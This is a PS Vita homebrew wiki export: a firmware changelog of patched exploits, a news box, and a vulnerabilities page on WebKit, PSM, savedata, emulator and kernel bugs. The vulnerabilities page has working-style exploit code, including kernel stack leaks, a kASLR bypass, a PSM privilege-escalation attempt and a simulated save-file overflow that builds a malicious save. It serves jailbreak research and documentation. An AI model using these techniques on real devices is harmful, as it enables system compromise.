* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*'near' will not show Maps and other related content anymore.<br />
*PSN has been renamed to PlayStation Network.<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the 256 MB of memory previously reserved for the operating system is now available to games.<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploits.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
<hr><br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed some bugs in SceNgs.<br />
*SSL library updated (along with the other networking libraries that use SceSsl); two new root certificates added.<br />
|-<br />
|align=center|'''3.70'''<br />January 14, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Changed the enc key<br />
*Forgot to change any other keys. Oops!<br />
|-<br />
|align=center|'''3.71'''<br />July 23, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed the Trinity exploit chain<br />
|-<br />
|align=center|'''3.72'''<br />August 27, 2019<br />
|<br />
TBD<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Main_Page/News&diff=11406Main Page/News2019-08-27T11:18:43Z<p>Xyz: h-encore2</p>
<hr />
<div>{{Box-round|title=News|<br />
* '''2019-08-26''': h-encore² is released<br />
* '''2019-05-05''': Trinity is released<br />
* '''2018-12-29''': [https://media.ccc.de/v/35c3-9364-viva_la_vita_vida 35C3: Viva la Vita Vida]<br />
* '''2018-07-01''': h-encore is released<br />
* '''2017-07-29''': HENkaku Ensō is released<br />
* '''2016-07-29''': HENkaku is released<br />
}}</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11313Vulnerabilities2019-07-31T23:58:46Z<p>Xyz: /* To be disclosed */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz so that HENkaku can be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) ====<br />
<br />
There are two exploits used for WebKit prior to FW 2.00. One is a data leakage exploit, CVE-2010-4577,<ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit, CVE-2010-1807, on the parseFloat() function using a NaN as the argument.<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many people. Patched on FW 3.30.<br />
<br />
The heap buffer overflow vulnerability exists in WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts a user-defined JavaScript comparison function and calls it from native code to compare array items. If this compare function reduces the array length, the trailing array items are written outside the "m_storage->m_vector[]" buffer, which corrupts the heap.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it is allocated. If the mutated list contains fewer entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.50-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (Vita FW 3.30-3.71) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next kernel exploit, named 2050 and 2051.<br />
<br />
Working on <= 3.71. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PS Store in 2015. Nevertheless, a set of tricks allows installing and using PSM on any PSVita on FW <= 3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in PSVita OS. This can be bypassed only with a kernel exploit and ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can therefore be installed using PKG Installer or the BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
The PSM developer license can be spoofed using filesystem write access and signed with the keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes the callback with <code>SecurityCritical</code>, allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature,<ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
    public class AppMain<br />
    {<br />
        // The callback is marked SecurityCritical; a transparent PSM app could not<br />
        // call it directly, but BeginGetResponse invokes it from critical code.<br />
        [SecurityCritical]<br />
        public static void Escalate (IAsyncResult result)<br />
        {<br />
            Console.WriteLine("Should be SecurityCritical");<br />
            // Allocating unmanaged memory is a critical operation: it only succeeds<br />
            // if the callback really runs with elevated trust.<br />
            IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
            Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr.ToInt64());<br />
        }<br />
<br />
        public static void Main (string[] args)<br />
        {<br />
            // CreateRequest needs a valid ticket; with the scoreboard service gone,<br />
            // AuthGetTicket fails here and the chain never reaches the callback.<br />
            Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
            Network.AuthGetTicket();<br />
            NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
            IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
            // Busy-wait until the request completes and the callback has run.<br />
            while (!result.IsCompleted)<br />
            {<br />
                Console.WriteLine("waiting...");<br />
            }<br />
            Console.WriteLine("Completed!");<br />
        }<br />
    }<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or only with difficulty).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku: instead of a WebKit exploit, it uses a gamesave exploit. The reason is that after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in the browser, which prevents loading additional sysmodules. This limitation is crucial, since loading sysmodules was the only way to get more syscalls than the browser itself uses: syscall numbers are randomized at boot and only assigned to syscall slots if some user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kernel exploits.<br />
<br />
==== Old games do not have ASLR ====<br />
<br />
A gamesave exploit is possible on such a system because games developed with SDK 2.60 and lower were compiled as statically linked executables, so their load address is always the same, namely 0x81000000, and they cannot be relocated to another region. They also do not have stack protection enabled by default, which means that if we can smash the stack in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process: you fuzz gamesaves by writing random data at random locations until you get a crash (the best bet is extending strings and hoping to smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug lies in the bittersmile game's save parser. The gamesave is actually a text file; the game reads it line by line and copies each line into one of a list of buffers. However, it does not validate the length, so if we put the delimiter \n far enough away that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer were on the stack, we could overwrite the return address and directly execute our ROP chain. It is in the data section instead, but luckily for us, the content after the buffer is the list holding the destinations for the other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line wherever we want, which gives us an arbitrary write primitive.<br />
<br />
Not patchable. The Bittersmile game requires a minimum FW of ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
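<br />
The parser bug described above, modelled in C as an added example. This is not the game's code and not TheFloW's or Freakler's; the layout, buffer sizes and offsets are assumptions chosen so the demonstration is deterministic. A flat byte array stands in for the game's data section, with the line-0 buffer followed directly by the destination table, and 16-bit little-endian offsets stand in for the destination pointers. <code>parse_save()</code> with <code>hardened == 0</code> copies each line however long it is, so a constructed save whose first line spills over the table redirects the second line onto an unrelated variable, which is the arbitrary write primitive the text describes. With <code>hardened == 1</code> the same save is rejected by the length check the game lacks. The fuzzing heuristic of the previous section (extend a string until the parser misbehaves) is what finds the first step.<br />
<br />
```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Simulated .data section. Layout is an illustrative assumption, not the game's
 * real one; little-endian uint16_t offsets stand in for destination pointers. */
#define ARENA_SIZE 256
#define LINE_CAP   16    /* bytes a line buffer can hold */
#define NUM_LINES  4
#define OFF_BUF0   0     /* buffer for line 0 */
#define OFF_TABLE  16    /* destination table, directly after buffer 0 */
#define OFF_BUFS   32    /* buffers for lines 1..3 */
#define OFF_VICTIM 200   /* unrelated variable the parser must never touch */

typedef struct { uint8_t mem[ARENA_SIZE]; } data_section;

static void data_init(data_section *d) {
    const uint16_t dests[NUM_LINES] = { OFF_BUF0, OFF_BUFS, OFF_BUFS + 16, OFF_BUFS + 32 };
    memset(d->mem, 0, sizeof d->mem);
    memcpy(d->mem + OFF_TABLE, dests, sizeof dests);
    memcpy(d->mem + OFF_VICTIM, "INTACT", 6);
}

/* Re-read from the table for every line: this is where an earlier overflow bites. */
static uint16_t dest_of(const data_section *d, int i) {
    uint16_t o;
    memcpy(&o, d->mem + OFF_TABLE + 2 * i, sizeof o);
    return o;
}

/* Line-by-line save parser. hardened == 0 reproduces the bug class (copy the
 * whole line whatever its length); hardened == 1 adds the missing length check.
 * Returns the number of lines stored, or -1 if the save was rejected. */
static int parse_save(data_section *d, const uint8_t *save, size_t len, int hardened) {
    int i = 0;
    size_t pos = 0;
    while (pos < len && i < NUM_LINES) {
        size_t end = pos;
        while (end < len && save[end] != '\n') end++;
        size_t n = end - pos;
        if (hardened && n > LINE_CAP) return -1;        /* the check the game lacks */
        uint16_t dst = dest_of(d, i);
        if ((size_t)dst + n > ARENA_SIZE) return -1;     /* demo-only: stay inside the arena */
        memcpy(d->mem + dst, save + pos, n);
        i++;
        pos = end + 1;
    }
    return i;
}

static int victim_intact(const data_section *d) {
    return memcmp(d->mem + OFF_VICTIM, "INTACT", 6) == 0;
}

/* Constructed malicious save (not a real Bittersmile file): line 0 fills buffer 0,
 * then spills 4 bytes onto table entries 0 and 1, pointing entry 1 at OFF_VICTIM;
 * line 1 is the payload that the redirected copy then writes there. */
static size_t build_attack_save(uint8_t *out) {
    size_t n = 0;
    memset(out, 'A', LINE_CAP); n += LINE_CAP;
    out[n++] = OFF_BUF0;   out[n++] = 0;      /* entry 0, already consumed: leave as is */
    out[n++] = OFF_VICTIM; out[n++] = 0;      /* entry 1 := 200 (little-endian) */
    out[n++] = '\n';
    memcpy(out + n, "PWNED", 5); n += 5;
    return n;
}

/* 1 if the unchecked parser let line 1 land on the victim variable. */
int demo_vulnerable(void) {
    data_section d; uint8_t save[32];
    data_init(&d);
    size_t len = build_attack_save(save);
    return parse_save(&d, save, len, 0) == 2 && memcmp(d.mem + OFF_VICTIM, "PWNED", 5) == 0;
}

/* 1 if the hardened parser rejects the same save and leaves the victim intact. */
int demo_hardened(void) {
    data_section d; uint8_t save[32];
    data_init(&d);
    size_t len = build_attack_save(save);
    return parse_save(&d, save, len, 1) == -1 && victim_intact(&d);
}

/* 1 if a well-formed save is stored where the table says it should go. */
int demo_benign(void) {
    static const uint8_t save[] = "hello\nworld";
    data_section d;
    data_init(&d);
    return parse_save(&d, save, sizeof save - 1, 1) == 2
        && memcmp(d.mem + OFF_BUF0, "hello", 5) == 0
        && memcmp(d.mem + OFF_BUFS, "world", 5) == 0;
}

int main(void) {
    printf("unchecked parser: victim overwritten = %d\n", demo_vulnerable());
    printf("hardened parser:  save rejected      = %d\n", demo_hardened());
    printf("benign save handled = %d\n", demo_benign());
    return 0;
}
```
<br />
Build with any C compiler (for example <code>gcc -Wall -o save_parser save_parser.c</code>) and run it; each demo function returns 1 on success. The arena guard is there only so the simulation stays well defined; the real game has no such guard, which is exactly why the overflow reaches the table after the buffer and, from there, any address the attacker chooses.<br />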
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs with system privileges, which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the sandboxed WebKit process. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability so that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC doesn't sanity-check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that however much Sony hardens the PSVita store, we will always be able to activate as long as the PS3 store is not secured.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate a PSVita, we only have to spoof the firmware version to bypass the FW Update popup, and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are no longer needed.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team. Implemented in Mathieulh's early PSVita FW exploit chain.<br />
<br />
A large syscall number passed in R12 can index past the end of the syscall table, causing an arbitrary function pointer to be dereferenced and executed.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via WebKit exploits (not fself nor games, but maybe ePSP or PSM).<br />
<br />
Call some functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get up to 0x3FF bytes of that kernel stack!<br />
<br />
<source lang="C"><br />
#include <string.h><br />
#include <psp2/io/fcntl.h>   // sceIoOpen (vitasdk header)<br />
#include <psp2/io/devctl.h>  // sceIoDevctl (vitasdk header)<br />
<br />
// make a buffer, tagged with '0x66' bytes so leaked kernel data stands out<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, sizeof(outbuf));<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
// kernel stack leak to outbuf (pass the array itself, not its address)<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, outbuf, 0x3FF);<br />
<br />
// check if kernel data was actually written to outbuf (hex_dump is a helper, not shown here)<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in the range (0x80, 0x1000], it uses the SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available, instead of returning NULL it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
          socket,<br />
          11,<br />
          flags_,<br />
          mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or on firmwares just before. These exploits are not usable on retail/testkit because the functions used are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
#include <stdint.h><br />
#include <stddef.h><br />
<br />
// sceMotionDevGetEvaInfo is only exported on DevKit (see the note above)<br />
uint32_t get_sysmem_base() {<br />
    uint32_t info[0x12];<br />
<br />
    // 1) Call a function that writes sp to kernel stack<br />
    sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
    // 2) Leak kernel stack<br />
    sceMotionDevGetEvaInfo(info);<br />
<br />
    // 3) Get sysmem base<br />
    uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
    return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (XORed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds primitive to get kernel code execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be XORed, or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME value makes finding the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#include <string.h><br />
<br />
#define DEVCTL_STACK_FRAME 0x728 // value specific to 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
// Returns the kernel stack base address, or 0xFFFFFFF if it was not found<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
    SceInt32 ret = 0;<br />
<br />
    SceNgsRackDescription rackDesc;<br />
    rackDesc.nChannelsPerVoice = 1;<br />
    rackDesc.nVoices = 1;<br />
    rackDesc.nMaxPatchesPerInput = 0;<br />
    rackDesc.nPatchesPerOutput = 1;<br />
<br />
    // fake voice definition, copied onto the kernel stack by sceIoDevctl<br />
    unsigned int voiceDef[0x400];<br />
    memset(voiceDef, 0x00, sizeof(voiceDef));<br />
    voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
    voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
    voiceDef[2] = 0x40;<br />
    voiceDef[3] = 0x40;<br />
    sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
    sceKernelDelayThread(2*1000*1000);<br />
<br />
    // scan candidate kernel stack pages until the fake definition is accepted<br />
    for (unsigned int addr = DEVCTL_STACK_FRAME; addr < 0x3000000; addr += 0x1000)<br />
    {<br />
        rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
        ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
        gRet = ret;<br />
        if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
            continue;<br />
        else<br />
            return (addr - DEVCTL_STACK_FRAME);<br />
    }<br />
    return 0xFFFFFFF;<br />
}<br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The two following bugs are exploited by calling memcpy with a negative length, in order to get an out-of-bounds access without copying an enormous buffer or triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
